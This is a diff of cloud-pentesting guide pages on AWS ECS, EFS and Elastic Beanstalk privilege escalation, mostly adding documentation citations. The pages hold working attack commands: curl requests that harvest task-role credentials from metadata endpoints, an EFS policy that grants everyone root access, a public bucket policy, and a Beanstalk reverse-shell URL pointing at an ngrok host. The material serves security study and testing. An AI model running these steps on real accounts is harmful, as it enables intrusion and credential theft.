-- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`
-- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`
-- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`
+- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`<sup>[[7]](#references)</sup>
+- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`<sup>[[7]](#references)</sup>
+- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`<sup>[[7]](#references)</sup>
+- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`<sup>[[7]](#references)</sup>
 
 You can find **examples of those options** in **previous ECS privesc sections**.
 
-**Potential Impact:** Privesc to a different role attached to containers.
+**Potential Impact:** Privesc to a different role attached to containers.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ### `ssm:StartSession`
 
@@ -319,21 +318,21 @@ Check in the **ec2 privesc page** how you can abuse these permissions to **prive
 
 An attacker with these permissions can often **turn "cluster membership" into a security boundary bypass**:
 
-- Register an **attacker-controlled EC2 instance** into a victim ECS cluster (becoming a container instance)
-- Set custom **container instance attributes** to satisfy **placement constraints**
-- Let ECS schedule tasks onto that host
-- Steal **task role credentials** (and any secrets/data inside the container) from the task running on your host
+- Register an **attacker-controlled EC2 instance** into a victim ECS cluster (becoming a container instance)<sup>[[9]](#references)</sup>
+- Set custom **container instance attributes** to satisfy **placement constraints**<sup>[[10]](#references)</sup>
+- Let ECS schedule tasks onto that host<sup>[[10]](#references)</sup>
+- Steal **task role credentials** (and any secrets/data inside the container) from the task running on your host<sup>[[1]](#references)[[2]](#references)[[9]](#references)[[10]](#references)</sup>
 
 High-level workflow:
 
-1) Obtain an EC2 instance identity document + signature from an EC2 instance you control in the target account (for example via SSM/SSH):
+1) Obtain an EC2 instance identity document + signature from an EC2 instance you control in the target account (for example via SSM/SSH).<sup>[[9]](#references)</sup>
 
 ```bash
 curl -s http://169.254.169.254/latest/dynamic/instance-identity/document > iidoc.json
 curl -s http://169.254.169.254/latest/dynamic/instance-identity/signature > iisig
 ```
 
-2) Register it into the target cluster, optionally setting attributes to satisfy placement constraints:
+2) Register it into the target cluster, optionally setting attributes to satisfy placement constraints.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws ecs register-container-instance \
@@ -349,7 +348,7 @@ aws ecs register-container-instance \
 aws ecs list-container-instances --cluster "$CLUSTER"
 ```
 
-4) Start a task / update a service so something schedules on the instance, then harvest task role creds from inside the task:
+4) Start a task / update a service so something schedules on the instance, then harvest task role creds from inside the task.<sup>[[2]](#references)[[10]](#references)</sup>
 
 ```bash
 # On the container host:
@@ -360,16 +359,18 @@ curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 
 Notes:
 
-- Registering a container instance using the instance identity document/signature implies you have access to an EC2 instance in the target account (or have compromised one). For cross-account "bring your own EC2", see the **ECS Anywhere** technique in this page.
-- Placement constraints commonly rely on container instance attributes. Enumerate them via `ecs:DescribeServices`, `ecs:DescribeTaskDefinition`, and `ecs:DescribeContainerInstances` to know which attributes you need to set.
+- Registering a container instance using the instance identity document/signature implies you have access to an EC2 instance in the target account (or have compromised one). For cross-account "bring your own EC2", see the **ECS Anywhere** technique in this page.<sup>[[9]](#references)[[13]](#references)</sup>
+- Placement constraints commonly rely on container instance attributes. Enumerate them via `ecs:DescribeServices`, `ecs:DescribeTaskDefinition`, and `ecs:DescribeContainerInstances` to know which attributes you need to set.<sup>[[10]](#references)</sup>
 
 
-### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
+### `ecs:RegisterTaskDefinition`, `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
 
 > [!NOTE]
 > TODO: Test this
 
-An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**.
+An attacker with the permissions `ecs:RegisterTaskDefinition`, `ecs:CreateTaskSet`, and `ecs:UpdateServicePrimaryTaskSet` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. `ecs:DescribeTaskSets` can be used to inspect task-set state.<sup>[[3]](#references)[[11]](#references)</sup>
+
+The `CreateTaskSet` and `UpdateServicePrimaryTaskSet` APIs apply to services using the `EXTERNAL` deployment controller, so the example requires a compatible service.<sup>[[11]](#references)</sup>
 
 ```bash
 # Register a task definition with a reverse shell
@@ -397,106 +398,27 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service --
 aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
 ```
 
-**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.
-
-## References
-
-- [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods)
-
-
-
-
-
-
+**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.<sup>[[11]](#references)</sup>
 
 ### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
 
-An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.
+An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.<sup>[[1]](#references)[[2]](#references)[[12]](#references)</sup>
 
-Commands (us-east-1):
+**Potential Impact:** Attacker-controlled EC2 nodes receive victim tasks, enabling OS-level access to containers and theft of task IAM role credentials.<sup>[[2]](#references)[[12]](#references)</sup>
 
-- Prereqs
-
-
-
-- Create Launch Template for ECS agent to join target cluster
-
-
-
-- Create Auto Scaling Group
-
-
-
-- Create Capacity Provider from the ASG
-
-
-
-- Associate the Capacity Provider to the cluster (optionally as default)
-
-
-
-- Migrate a service to your provider
-
-
-
-- Verify tasks land on attacker instances
-
-
-
-- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.
-
-- Cleanup
-
-
-
-**Potential Impact:** Attacker-controlled EC2 nodes receive victim tasks, enabling OS-level access to containers and theft of task IAM role credentials.
-
-
-<details>
-<summary>Step-by-step commands (copy/paste)</summary>
-<pre>
-export AWS_DEFAULT_REGION=us-east-1
-CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
-# Instance profile for ECS nodes
-aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
-aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
-aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
-aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true
-
-VPC=vpc-18e6ac62
-SUBNETS=
-
-AMI=ami-0b570770164588ab4
-USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
-LT_ID=
-
-ASG_ARN=
-
-CP_NAME=htcp-8797
-aws ecs create-capacity-provider --name  --auto-scaling-group-provider "autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
-aws ecs put-cluster-capacity-providers --cluster "" --capacity-providers  --default-capacity-provider-strategy capacityProvider=,weight=1
-
-SVC=
-# Task definition must be EC2-compatible (not Fargate-only)
-aws ecs update-service --cluster "" --service "" --capacity-provider-strategy capacityProvider=,weight=1 --force-new-deployment
-
-TASK=
-CI=
-aws ecs describe-container-instances --cluster "" --container-instances "" --query containerInstances[0].ec2InstanceId --output text
-</pre>
-</details>
+This requires an EC2-compatible task definition and enough EC2, IAM, Auto Scaling, and ECS permissions to create the instance profile and launch template, create the Auto Scaling group, create and associate the capacity provider, and update the target service. Verify placement with `ecs:DescribeTasks` and `ecs:DescribeContainerInstances` before accessing the resulting container host.<sup>[[12]](#references)</sup>
 
 ### Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
 
-Abuse ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in a victim ECS cluster and run tasks on that host using privileged task and execution roles. This grants OS-level control over where tasks run (your own machine) and allows credential/data theft from tasks and attached volumes without touching capacity providers or ASGs.
+Abuse ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in a victim ECS cluster and run tasks on that host using privileged task and execution roles. This grants OS-level control over where tasks run (your own machine) and allows credential/data theft from tasks and attached volumes without touching capacity providers or ASGs.<sup>[[2]](#references)[[13]](#references)</sup>
 
-- Required perms (example minimal):
-  - ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
-  - ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
-  - iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)
-  - logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
+- Required perms (example minimal):<sup>[[13]](#references)[[14]](#references)[[15]](#references)</sup>
+  - `ecs:CreateCluster` (optional), `ecs:RegisterTaskDefinition`, and `ecs:StartTask` or `ecs:RunTask`.
+  - `ssm:CreateActivation`; cleanup can additionally use `ssm:DeregisterManagedInstance` and `ssm:DeleteActivation`.
+  - IAM permissions to create/configure the ECS Anywhere instance role and task roles, plus `iam:PassRole` for every role passed to AWS.
+  - CloudWatch Logs permissions if the example's `awslogs` configuration is used.<sup>[[6]](#references)[[13]](#references)</sup>
 
-- Impact: Run arbitrary containers with chosen taskRoleArn on attacker host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; access any volumes mounted by tasks; stealthier than manipulating capacity providers/ASGs.
+- Impact: Run arbitrary containers with chosen taskRoleArn on attacker host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; access any volumes mounted by tasks; stealthier than manipulating capacity providers/ASGs.<sup>[[2]](#references)[[8]](#references)[[13]](#references)</sup>
 
 Steps
 
@@ -506,7 +428,7 @@ Steps
 aws ecs create-cluster --cluster-name ht-ecs-anywhere
 ```
 
-2) Create ECS Anywhere role and SSM activation (for on-prem/EXTERNAL instance)
+2) Create ECS Anywhere role and SSM activation (for on-prem/EXTERNAL instance).<sup>[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 aws iam create-role --role-name ecsAnywhereRole \
@@ -517,7 +439,7 @@ ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
 ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)
 ```
 
-3) Provision attacker host and auto-register it as EXTERNAL (example: small AL2 EC2 as “on‑prem”)
+3) Provision an attacker-controlled host and register it as `EXTERNAL`. The following example uses an Amazon Linux 2 EC2 instance as a stand-in for an off-cloud host; replace the activation placeholders before running it.<sup>[[13]](#references)</sup>
 
 <details>
 <summary>user-data.sh</summary>
@@ -530,7 +452,7 @@ yum install -y docker curl jq
 systemctl enable --now docker
 curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
 chmod +x /root/ecs-anywhere-install.sh
-/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
+/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id <activation-id> --activation-code <activation-code> --region us-east-1
 ```
 
 </details>
@@ -542,7 +464,7 @@ IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
 aws ec2 wait instance-status-ok --instance-ids $IID
 ```
 
-4) Verify EXTERNAL container instance joined
+4) Verify EXTERNAL container instance joined. The external host must be registered as an SSM managed node and have the ECS container agent and Docker installed; hybrid managed-node IDs use the `mi-` prefix.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 aws ecs list-container-instances --cluster ht-ecs-anywhere
@@ -551,7 +473,7 @@ aws ecs describe-container-instances --cluster ht-ecs-anywhere \
 # ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external
 ```
 
-5) Create task/execution roles, register EXTERNAL task definition, and run it on the attacker host
+5) Create task/execution roles, register EXTERNAL task definition, and run it on the attacker host. The task execution role supplies permissions needed by the ECS agent for private ECR image pulls and `awslogs` output.<sup>[[6]](#references)[[13]](#references)</sup>
 
 ```bash
 # roles
@@ -589,54 +511,25 @@ aws ecs start-task --cluster ht-ecs-anywhere --task-definition ht-external \
   --container-instances $CI
 ```
 
-6) From here you control the host that runs the tasks. You can read task logs (if awslogs) or directly exec on the host to exfiltrate credentials/data from your tasks.
+6) From here you control the host that runs the tasks. You can read task logs (if awslogs) or directly exec on the host to exfiltrate credentials/data from your tasks.<sup>[[2]](#references)[[8]](#references)[[13]](#references)</sup>
 
+## References
 
+- [1] [ECS attack methods](https://ruse.tech/blogs/ecs-attack-methods)
+- [2] [Amazon ECS task IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html)
+- [3] [RegisterTaskDefinition](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html)
+- [4] [run-task — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecs/run-task.html)
+- [5] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [6] [Amazon ECS task execution IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_execution_IAM_role.html)
+- [7] [Monitor Amazon ECS containers with ECS Exec](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-exec.html)
+- [8] [Container credential provider](https://docs.aws.amazon.com/sdkref/latest/guide/feature-container-credentials.html)
+- [9] [RegisterContainerInstance](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterContainerInstance.html)
+- [10] [Define which container instances Amazon ECS uses for tasks](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-placement-constraints.html)
+- [11] [Deploy Amazon ECS services using a third-party controller](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-type-external.html)
+- [12] [Amazon ECS capacity providers for EC2 workloads](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/asg-capacity-providers.html)
+- [13] [Registering an external instance to an Amazon ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-anywhere-registration.html)
+- [14] [Create a hybrid activation to register nodes with Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/hybrid-activation-managed-nodes.html)
+- [15] [Amazon ECS Anywhere IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/iam-role-ecsanywhere.html)
+- [16] [Weaponizing AWS ECS Task Definitions to Steal Credentials From Running Containers](https://rhinosecuritylabs.com/aws/weaponizing-ecs-task-definitions-steal-credentials-running-containers/)
 
-#### Command example (placeholders)
-
-
-
-
-### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
-
-An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.
-
-Commands (us-east-1):
-
-- Prereqs
-
-
-
-- Create Launch Template for ECS agent to join target cluster
-
-
-
-- Create Auto Scaling Group
-
-
-
-- Create Capacity Provider from the ASG
-
-
-
-- Associate the Capacity Provider to the cluster (optionally as default)
-
-
-
-- Migrate a service to your provider
-
-
-
-- Verify tasks land on attacker instances
-
-
-
-- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.
-
-- Cleanup
-
-
-
-**Potential Impact:** Attacker-controlled EC2 nodes receive victim tasks, enabling OS-level access to containers and theft of task IAM role credentials.
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - EFS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EFS
 
 More **info about EFS** in:
@@ -10,26 +8,32 @@ More **info about EFS** in:
 ../../aws-services/aws-efs-enum.md
 {{#endref}}
 
-Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.
+To mount an EFS file system, a client must be able to establish a TCP connection to port 2049 on one of its mount targets; the client security group must allow outbound traffic and the mount-target security group must allow inbound traffic from the client.<sup>[[1]](#references)</sup> If no user-configured file-system policy is in effect, EFS's default policy grants full access to any anonymous client that can connect through a mount target. An explicit file-system policy can instead control the client actions described below.<sup>[[2]](#references)</sup>
 
 ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`
 
-With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted.
+An identity with `elasticfilesystem:DeleteFileSystemPolicy` can remove the explicit policy, after which EFS applies its default policy; an identity with `elasticfilesystem:PutFileSystemPolicy` can replace the policy with one that grants the desired client actions.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-To delete the policy:
+To delete the policy, use the `DeleteFileSystemPolicy` operation:<sup>[[3]](#references)</sup>
 
 ```bash
 aws efs delete-file-system-policy \
     --file-system-id <value>
 ```
 
-To change it:
+To replace it, prepare a policy that grants the desired client actions and apply it with the `PutFileSystemPolicy` operation.<sup>[[4]](#references)</sup>
+
+```bash
+aws efs put-file-system-policy \
+    --file-system-id <fs-id> \
+    --policy file:///tmp/policy.json
+```
+
+This example gives every principal matching the network and mount-target conditions read, write, and root access; narrow the principal and resource for a real environment.<sup>[[2]](#references)[[4]](#references)[[9]](#references)</sup>
+
+`policy.json`:
 
 ```json
-aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
-
-// Give everyone trying to mount it read, write and root access
-// policy.json:
 {
     "Version": "2012-10-17",
     "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
@@ -41,10 +45,11 @@ aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/pol
                 "AWS": "*"
             },
             "Action": [
-	       "elasticfilesystem:ClientRootAccess",
-               "elasticfilesystem:ClientWrite",
-               "elasticfilesystem:ClientMount"
+                "elasticfilesystem:ClientRootAccess",
+                "elasticfilesystem:ClientWrite",
+                "elasticfilesystem:ClientMount"
             ],
+            "Resource": "arn:aws:elasticfilesystem:<region>:<account-id>:file-system/<fs-id>",
             "Condition": {
                 "Bool": {
                     "elasticfilesystem:AccessedViaMountTarget": "true"
@@ -57,33 +62,37 @@ aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/pol
 
 ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`
 
-With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**.
+At the EFS policy layer, `elasticfilesystem:ClientMount` permits read-only access. `elasticfilesystem:ClientWrite` adds write access, and `elasticfilesystem:ClientRootAccess` permits use of the root user when accessing the file system.<sup>[[2]](#references)</sup>
+
+When IAM authorization is used, the EFS mount helper and the `tls,iam` mount options are required.<sup>[[5]](#references)</sup>
 
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
 ```
 
-The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**.
+The extra `elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` permissions can then be used to **write** inside the filesystem after it is mounted and to **access** that file system **as root**, subject to the file system's normal file and directory permissions.<sup>[[2]](#references)[[8]](#references)</sup>
 
 **Potential Impact:** Indirect privesc by locating sensitive information in the file system.
 
 ### `elasticfilesystem:CreateMountTarget`
 
-If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege:
+If an attacker is in a **subnet** of the VPC used by the EFS's mount targets, and the attacker's Availability Zone has **no mount target**, `elasticfilesystem:CreateMountTarget` can be used to create one in that subnet. EFS permits only one mount target per Availability Zone and only one VPC per file system; the call also requires `ec2:DescribeSubnets`, `ec2:DescribeNetworkInterfaces`, and `ec2:CreateNetworkInterface`.<sup>[[6]](#references)</sup>
 
 ```bash
-# You need to indicate security groups that will grant the user access to port 2049
+# The selected security group must allow client access to TCP port 2049
 aws efs create-mount-target --file-system-id <fs-id> \
     --subnet-id <value> \
     --security-groups <value>
 ```
 
+The client must also be able to send traffic to the mount target on TCP port 2049.<sup>[[1]](#references)</sup>
+
 **Potential Impact:** Indirect privesc by locating sensitive information in the file system.
 
 ### `elasticfilesystem:ModifyMountTargetSecurityGroups`
 
-In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**:
+If an attacker finds that the EFS has a mount target in the attacker's subnet but **no security group is allowing the traffic**, `elasticfilesystem:ModifyMountTargetSecurityGroups` can replace the mount target's security-group set with groups that allow NFS. The operation also requires `ec2:ModifyNetworkInterfaceAttribute` on the mount target's network interface.<sup>[[7]](#references)</sup>
 
 ```bash
 aws efs modify-mount-target-security-groups \
@@ -93,8 +102,16 @@ aws efs modify-mount-target-security-groups \
 
 **Potential Impact:** Indirect privesc by locating sensitive information in the file system.
 
+## References
+
+- [1] [Using VPC security groups - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/ug/network-access.html)
+- [2] [Using IAM to control access to file systems - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/ug/iam-access-control-nfs-efs.html)
+- [3] [DeleteFileSystemPolicy - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/APIReference/API_DeleteFileSystemPolicy.html)
+- [4] [PutFileSystemPolicy - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/APIReference/API_PutFileSystemPolicy.html)
+- [5] [Mounting with IAM authorization - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/ug/mounting-IAM-option.html)
+- [6] [CreateMountTarget - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/APIReference/API_CreateMountTarget.html)
+- [7] [ModifyMountTargetSecurityGroups - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/APIReference/API_ModifyMountTargetSecurityGroups.html)
+- [8] [Network File System (NFS) level users, groups, and permissions - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/ug/accessing-fs-nfs-permissions.html)
+- [9] [Resource-based policy examples for Amazon EFS - Amazon Elastic File System](https://docs.aws.amazon.com/efs/latest/ug/security_iam_resource-based-policy-examples.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Elastic Beanstalk Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Elastic Beanstalk
 
 More **info about Elastic Beanstalk** in:
@@ -11,11 +9,11 @@ More **info about Elastic Beanstalk** in:
 {{#endref}}
 
 > [!WARNING]
-> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
+> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**.<sup>[[1]](#references)</sup>
 
 ### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others
 
-With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it.
+With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it.<sup>[[3]](#references)[[6]](#references)</sup>
 
 ```bash
 # Create folder
@@ -34,7 +32,7 @@ aws elasticbeanstalk rebuild-environment --environment-name "env-name"
 
 ### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more...
 
-The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch.
+The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 - Create an AWS Elastic Beanstalk application:
 
@@ -42,39 +40,39 @@ The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling
 aws elasticbeanstalk create-application --application-name MyApp
 ```
 
-- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
+- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)).<sup>[[7]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
 ```
 
-If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one.
+If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one.<sup>[[6]](#references)</sup>
 
-- Package your application code and dependencies into a ZIP file:
+- Package your application code and dependencies into a ZIP file.<sup>[[2]](#references)</sup>
 
-```python
+```bash
 zip -r MyApp.zip .
 ```
 
-- Upload the ZIP file to an S3 bucket:
+- Upload the ZIP file to an S3 bucket.<sup>[[2]](#references)[[6]](#references)</sup>
 
-```python
+```bash
 aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
 ```
 
-- Create an AWS Elastic Beanstalk application version:
+- Create an AWS Elastic Beanstalk application version.<sup>[[6]](#references)</sup>
 
-```css
+```bash
 aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
 ```
 
-- Deploy the application version to your AWS Elastic Beanstalk environment:
+- Deploy the application version to your AWS Elastic Beanstalk environment.<sup>[[6]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
 ```
 
-### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses`
+### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`
 
 First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**:
 
@@ -129,7 +127,7 @@ Werkzeug==1.0.1
 {{#endtab }}
 {{#endtabs }}
 
-Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**):
+Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To do so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**).<sup>[[8]](#references)</sup>
 
 ```json
 {
@@ -176,25 +174,28 @@ aws elasticbeanstalk update-environment --environment-name MyEnv --version-label
 
 # To get your rev shell just access the exposed web URL with params such as:
 http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
